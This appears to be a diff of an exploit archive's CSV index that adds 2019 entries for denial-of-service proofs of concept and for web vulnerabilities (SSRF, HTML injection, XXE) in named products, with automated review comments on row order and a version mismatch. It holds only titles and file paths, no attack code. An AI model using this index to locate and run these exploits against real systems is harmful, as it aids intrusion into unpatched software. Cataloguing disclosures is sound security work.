 46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46819,exploits/windows/dos/46819.py,"jetCast Server 2.0 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46821,exploits/windows/dos/46821.py,"SpotIM 2.2 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
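Review bot: The new `46819` row is inserted between the `46817` and `46818` context rows, which breaks the ascending id order the surrounding dos/windows rows follow; the other four new rows (`46821` through `46824`) are appended after `46818` in order, so the `46819` line belongs directly after the `46818` row and before `46821`.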
@@ -41245,3 +41250,8 @@ id,file,description,date,author,type,platform,port
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
 46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
+46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
+46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,
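Review bot: The description in the new `46820` row gives the affected version as `TheHive Project Cortex < 1.15.2`, while the advisory it indexes (46820.txt, added in this same commit) states `Cortex <= 2.1.3` and `Tested on: 2.1.3`; 1.15.2 appears in that advisory only inside the vendor reference URL as a Cortex-Analyzers release, so the row appears to name the analyzer package version rather than the Cortex version, which is worth confirming before this lands. Suggested: `46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex <= 2.1.3 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,`.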